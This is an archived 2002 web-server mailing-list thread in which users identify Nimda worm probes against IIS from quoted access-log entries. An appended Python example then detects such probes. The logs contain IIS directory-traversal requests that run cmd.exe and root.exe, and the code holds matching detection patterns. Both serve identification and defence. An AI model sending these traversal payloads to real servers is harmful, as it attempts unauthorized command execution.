If anyone needs the file, Dave, I have IIS running, and I have the "Healing"
file for anyone that needs it. Just email me, it is only a few Kbytes, and
can be easily emailed...

Kim

----- Original Message -----
From: "Dave Culbertson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Saturday, May 11, 2002 8:02 AM
Subject: [sambar] Access log entries {03}


> Thanks, Hank, Tony and Alex. I was aware that it was no harm to Sambar and since I don't run IIS, no worries here. However, I have tracked down one of the offending servers and wanted to contact them with informed information. That's why I needed the name of the virus on their server.
>
> Dave Culbertson
>
> On 11/May/2002 10:51:22, Tony Mallen wrote:
> > Nimda virus from unpatched Microsoft servers. But it's getting a 404 error so should be okay.
> >
> > On 11/May/2002 04:59:49, Dave Culbertson wrote:
> > > Does anyone recognize what kind of virus or bot would cause the following access log entries?
> > >
> > > 64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:07 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:08 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:09 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:12 -0400] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET /scripts/..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:14 -0400] "GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:15 -0400] "GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:16 -0400] "GET /scripts/..�o../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:17 -0400] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:21 -0400] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:23 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > >
> > > I am being accessed by quite a few computers with the same or similar entries and would like to know the name of what this is. Thanks.
> > >
> > > Dave Culbertson
> > >
> > > -------------------------------------------------------
> > > To unsubscribe please go to http://www.sambar.ch/list/
>
>
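
One way to pick entries like the ones quoted above out of an access log and see, per source address, whether any probe got something other than an error back. This is an added example, not code from anyone in the thread; the regular expressions, reason labels and function names are assumptions, and the last two sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Entry layout as quoted in the thread: CLF fields, then one extra number, referer, agent.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"\S+ (?P<target>\S+) \S+" (?P<status>\d{3}) ')
SHELL_RE = re.compile(r'[\\/](?:cmd|root)\.exe$', re.I)
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')

def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded separator is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(path, errors="replace")
        if decoded == path:
            break
        path = decoded
    return path

def classify(line):
    """Return (ip, status, reasons) for a probe-like entry, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    path = fully_decode(path)
    reasons = []
    if SHELL_RE.search(path):
        reasons.append("shell-binary")
    if TRAVERSAL_RE.search(path):
        reasons.append("traversal")
    if query.lower().startswith("/c+"):
        reasons.append("command-query")
    return (m["ip"], int(m["status"]), reasons) if reasons else None

def summarize(lines):
    """Per source IP: probe count, and how many probes did not get an error status."""
    report = defaultdict(lambda: {"probes": 0, "served": 0})
    for hit in filter(None, map(classify, lines)):
        report[hit[0]]["probes"] += 1
        report[hit[0]]["served"] += hit[1] < 400
    return dict(report)

TAIL = ' HTTP/1.0" 404 565 0 "-" "-"'
SAMPLE = [  # first three entries are from the thread; the last two are constructed
    '64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir' + TAIL,
    '64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir' + TAIL,
    '64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir' + TAIL,
    '192.0.2.10 - - [04/May/2002:00:46:00 -0400] "GET /index.htm HTTP/1.0" 200 1024 0 "-" "-"',
    '192.0.2.77 - - [04/May/2002:00:47:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 300 0 "-" "-"',
]
```

A source whose "served" count is zero, as with the 404 responses in the thread, was only probing; a non-zero count is the case worth investigating.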

